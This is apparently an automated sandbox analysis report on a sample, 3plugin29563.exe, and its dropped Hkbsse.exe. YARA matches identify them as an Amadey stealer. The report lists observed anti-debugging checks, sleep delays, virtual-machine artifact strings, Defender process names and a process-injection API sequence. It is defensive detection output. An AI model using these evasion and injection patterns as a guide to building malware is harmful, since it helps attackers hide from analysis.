Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Window / User API: threadDelayed 5723
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Window / User API: threadDelayed 3858

Source: C:\Users\user\Desktop\3plugin29563.exe	API coverage: 3.0 %
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	API coverage: 6.4 %

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 7044	Thread sleep count: 5723 > 30
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 7044	Thread sleep time: -171690000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 516	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 6252	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 6688	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 7044	Thread sleep count: 3858 > 30
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe TID: 7044	Thread sleep time: -115740000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\3plugin29563.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0043DB3D FindFirstFileExW,	0_2_0043DB3D
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0214DDA4 FindFirstFileExW,	0_2_0214DDA4
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0043DB3D FindFirstFileExW,	21_2_0043DB3D
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0072DDA4 FindFirstFileExW,	21_2_0072DDA4

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_00407C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00407C40

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Thread delayed: delay time: 30000

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.000000000084F000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\3plugin29563.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\3plugin29563.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_00436A4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00436A4E

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_0042BF39 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042BF39

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0043A232 mov eax, dword ptr fs:[00000030h]	0_2_0043A232
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004364CB mov eax, dword ptr fs:[00000030h]	0_2_004364CB
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00783DE3 push dword ptr fs:[00000030h]	0_2_00783DE3
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02146732 mov eax, dword ptr fs:[00000030h]	0_2_02146732
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0214A499 mov eax, dword ptr fs:[00000030h]	0_2_0214A499
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0211092B mov eax, dword ptr fs:[00000030h]	0_2_0211092B
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02110D90 mov eax, dword ptr fs:[00000030h]	0_2_02110D90
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0043A232 mov eax, dword ptr fs:[00000030h]	21_2_0043A232
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_004364CB mov eax, dword ptr fs:[00000030h]	21_2_004364CB
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0072A499 mov eax, dword ptr fs:[00000030h]	21_2_0072A499
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00726732 mov eax, dword ptr fs:[00000030h]	21_2_00726732
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_006F092B mov eax, dword ptr fs:[00000030h]	21_2_006F092B
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_006F0D90 mov eax, dword ptr fs:[00000030h]	21_2_006F0D90
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0078404B push dword ptr fs:[00000030h]	21_2_0078404B

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Code function: 21_2_0043ED93 GetProcessHeap,

21_2_0043ED93

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0041D189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041D189
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00436A4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00436A4E
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0041DB45 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041DB45
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0041DCAA SetUnhandledExceptionFilter,	0_2_0041DCAA
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0212D3F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0212D3F0
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02146CB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_02146CB5
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0212DDAC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0212DDAC
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00436A4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00436A4E
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0041D189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0041D189
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0041DB45 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0041DB45
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0041DCAA SetUnhandledExceptionFilter,	21_2_0041DCAA
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00726CB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00726CB5
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0070D3F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0070D3F0
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0070DDAC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0070DDAC

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_00406FB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_00406FB0

Source: C:\Users\user\Desktop\3plugin29563.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 900

Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_0041DD31 cpuid

0_2_0041DD31

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe VolumeInformation

Source: C:\Users\user\Desktop\3plugin29563.exe

0_2_0040A879

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_0040B010 GetUserNameA,

0_2_0040B010

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_00442447 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00442447

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_00407C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00407C40

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.3plugin29563.exe.2110e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3plugin29563.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.Hkbsse.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hkbsse.exe.6f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3plugin29563.exe.2110e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.3plugin29563.exe.2180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.Hkbsse.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hkbsse.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hkbsse.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hkbsse.exe.6f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.3plugin29563.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.3plugin29563.exe.2180000.0.raw.unpack, type: UNPACKEDPE
